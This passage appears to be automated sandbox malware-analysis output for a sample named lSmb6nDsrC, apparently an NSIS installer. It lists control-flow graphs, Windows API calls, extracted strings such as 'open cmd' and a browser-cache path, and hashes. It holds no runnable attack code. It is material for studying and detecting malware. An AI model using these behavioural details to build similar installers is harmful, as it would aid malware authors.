                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                    • String ID: : Completed$Completed$Genetics Announcements Mess Premier Appliance Structures $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                    • API String ID: 4024019347-2370702845
                                                    • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                    • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                    • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                    • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 506 401774-401799 call 402dab call 405e67 511 4017a3-4017b5 call 406521 call 405df0 lstrcatW 506->511 512 40179b-4017a1 call 406521 506->512 517 4017ba-4017bb call 4067cf 511->517 512->517 521 4017c0-4017c4 517->521 522 4017c6-4017d0 call 40687e 521->522 523 4017f7-4017fa 521->523 530 4017e2-4017f4 522->530 531 4017d2-4017e0 CompareFileTime 522->531 524 401802-40181e call 406011 523->524 525 4017fc-4017fd call 405fec 523->525 533 401820-401823 524->533 534 401892-4018bb call 4055a6 call 4032b9 524->534 525->524 530->523 531->530 535 401874-40187e call 4055a6 533->535 536 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 533->536 546 4018c3-4018cf SetFileTime 534->546 547 4018bd-4018c1 534->547 548 401887-40188d 535->548 536->521 568 401869-40186a 536->568 550 4018d5-4018e0 FindCloseChangeNotification 546->550 547->546 547->550 551 402c38 548->551 554 4018e6-4018e9 550->554 555 402c2f-402c32 550->555 556 402c3a-402c3e 551->556 558 4018eb-4018fc call 40655e lstrcatW 554->558 559 4018fe-401901 call 40655e 554->559 555->551 565 401906-4023a7 call 405b81 558->565 559->565 565->555 565->556 568->548 570 40186c-40186d 568->570 570->535
                                                    APIs
                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                    • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017DA
                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                      • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
                                                      • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
                                                    • API String ID: 1941528284-535101974
                                                    • Opcode ID: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
                                                    • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                    • Opcode Fuzzy Hash: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
                                                    • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 572 4055a6-4055bb 573 4055c1-4055d2 572->573 574 405672-405676 572->574 575 4055d4-4055d8 call 40655e 573->575 576 4055dd-4055e9 lstrlenW 573->576 575->576 578 405606-40560a 576->578 579 4055eb-4055fb lstrlenW 576->579 581 405619-40561d 578->581 582 40560c-405613 SetWindowTextW 578->582 579->574 580 4055fd-405601 lstrcatW 579->580 580->578 583 405663-405665 581->583 584 40561f-405661 SendMessageW * 3 581->584 582->581 583->574 585 405667-40566a 583->585 584->583 585->574
                                                    APIs
                                                    • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                    • lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                    • lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
                                                    • SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                    • String ID: Completed
                                                    • API String ID: 2531174081-3087654605
                                                    • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                    • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                    • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                    • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 586 4032b9-4032d0 587 4032d2 586->587 588 4032d9-4032e1 586->588 587->588 589 4032e3 588->589 590 4032e8-4032ed 588->590 589->590 591 4032fd-40330a call 40349e 590->591 592 4032ef-4032f8 call 4034b4 590->592 596 403310-403314 591->596 597 403455 591->597 592->591 599 40331a-40333a GetTickCount call 406a70 596->599 600 40343e-403440 596->600 598 403457-403458 597->598 601 403497-40349b 598->601 610 403494 599->610 611 403340-403348 599->611 602 403442-403445 600->602 603 403489-40348d 600->603 606 403447 602->606 607 40344a-403453 call 40349e 602->607 608 40345a-403460 603->608 609 40348f 603->609 606->607 607->597 619 403491 607->619 613 403462 608->613 614 403465-403473 call 40349e 608->614 609->610 610->601 615 40334a 611->615 616 40334d-40335b call 40349e 611->616 613->614 614->597 623 403475-403481 call 4060c3 614->623 615->616 616->597 624 403361-40336a 616->624 619->610 629 403483-403486 623->629 630 40343a-40343c 623->630 626 403370-40338d call 406a90 624->626 632 403393-4033aa GetTickCount 626->632 633 403436-403438 626->633 629->603 630->598 634 4033f5-4033f7 632->634 635 4033ac-4033b4 632->635 633->598 636 4033f9-4033fd 634->636 637 40342a-40342e 634->637 638 4033b6-4033ba 635->638 639 4033bc-4033ed MulDiv wsprintfW call 4055a6 635->639 640 403412-403418 636->640 641 4033ff-403404 call 4060c3 636->641 637->611 642 403434 637->642 638->634 638->639 646 4033f2 639->646 645 40341e-403422 640->645 647 403409-40340b 641->647 642->610 645->626 648 403428 645->648 646->634 647->630 649 40340d-403410 647->649 648->610 649->645
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CountTick$wsprintf
                                                    • String ID: ... %d%%
                                                    • API String ID: 551687249-2449383134
                                                    • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                    • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                    • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                    • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 650 4068a5-4068c5 GetSystemDirectoryW 651 4068c7 650->651 652 4068c9-4068cb 650->652 651->652 653 4068dc-4068de 652->653 654 4068cd-4068d6 652->654 656 4068df-406912 wsprintfW LoadLibraryExW 653->656 654->653 655 4068d8-4068da 654->655 655->656
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                    • wsprintfW.USER32 ref: 004068F7
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                    • String ID: %s%S.dll$UXTHEME
                                                    • API String ID: 2200240437-1106614640
                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                    • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                    • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 657 406040-40604c 658 40604d-406081 GetTickCount GetTempFileNameW 657->658 659 406090-406092 658->659 660 406083-406085 658->660 662 40608a-40608d 659->662 660->658 661 406087 660->661 661->662
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 0040605E
                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6), ref: 00406079
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CountFileNameTempTick
                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
                                                    • API String ID: 1716503409-3083371207
                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                    • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                    • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 746 4015c6-4015da call 402dab call 405e9b 751 401636-401639 746->751 752 4015dc-4015ef call 405e1d 746->752 754 401668-4022fb call 401423 751->754 755 40163b-40165a call 401423 call 406521 SetCurrentDirectoryW 751->755 761 4015f1-4015f4 752->761 762 401609-40160c call 405acf 752->762 769 402c2f-402c3e 754->769 755->769 772 401660-401663 755->772 761->762 763 4015f6-4015fd call 405aec 761->763 770 401611-401613 762->770 763->762 776 4015ff-401607 call 405a75 763->776 774 401615-40161a 770->774 775 40162c-401634 770->775 772->769 778 401629 774->778 779 40161c-401627 GetFileAttributesW 774->779 775->751 775->752 776->770 778->775 779->775 779->778
                                                    APIs
                                                      • Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                      • Part of subcall function 00405A75: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AB7
                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 00401652
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401645
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                    • API String ID: 1892508949-3291747264
                                                    • Opcode ID: cf48e78cf18fb2c53abcdbd1c73633e89cd3f4632428b8033e9ed2494124727c
                                                    • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                    • Opcode Fuzzy Hash: cf48e78cf18fb2c53abcdbd1c73633e89cd3f4632428b8033e9ed2494124727c
                                                    • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 786 407074-40707a 787 40707c-40707e 786->787 788 40707f-40709d 786->788 787->788 789 407370-40737d 788->789 790 4072ab-4072c0 788->790 793 4073a7-4073ab 789->793 791 4072c2-4072d8 790->791 792 4072da-4072f0 790->792 796 4072f3-4072fa 791->796 792->796 794 40740b-40741e 793->794 795 4073ad-4073ce 793->795 799 407327-40732d 794->799 797 4073d0-4073e5 795->797 798 4073e7-4073fa 795->798 800 407321 796->800 801 4072fc-407300 796->801 803 4073fd-407404 797->803 798->803 806 406ad2 799->806 807 4074da 799->807 800->799 804 407306-40731e 801->804 805 4074af-4074b9 801->805 808 4073a4 803->808 809 407406 803->809 804->800 810 4074c5-4074d8 805->810 811 406ad9-406add 806->811 812 406c19-406c3a 806->812 813 406b7e-406b82 806->813 814 406bee-406bf2 806->814 815 4074dd-4074e1 807->815 808->793 817 407389-4073a1 809->817 818 4074bb 809->818 810->815 811->810 819 406ae3-406af0 811->819 812->790 822 406b88-406ba1 813->822 823 40742e-407438 813->823 820 406bf8-406c0c 814->820 821 40743d-407447 814->821 817->808 818->810 819->807 824 406af6-406b3c 819->824 825 406c0f-406c17 820->825 821->810 826 406ba4-406ba8 822->826 823->810 827 406b64-406b66 824->827 828 406b3e-406b42 824->828 825->812 825->814 826->813 829 406baa-406bb0 826->829 834 406b74-406b7c 827->834 835 406b68-406b72 827->835 832 406b44-406b47 GlobalFree 828->832 833 406b4d-406b5b GlobalAlloc 828->833 830 406bb2-406bb9 829->830 831 406bda-406bec 829->831 836 406bc4-406bd4 GlobalAlloc 830->836 837 406bbb-406bbe GlobalFree 830->837 831->825 832->833 833->807 838 406b61 833->838 834->826 835->834 835->835 836->807 836->831 837->836 838->827
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                    • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                    • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                    • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                    • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                    • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                    • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
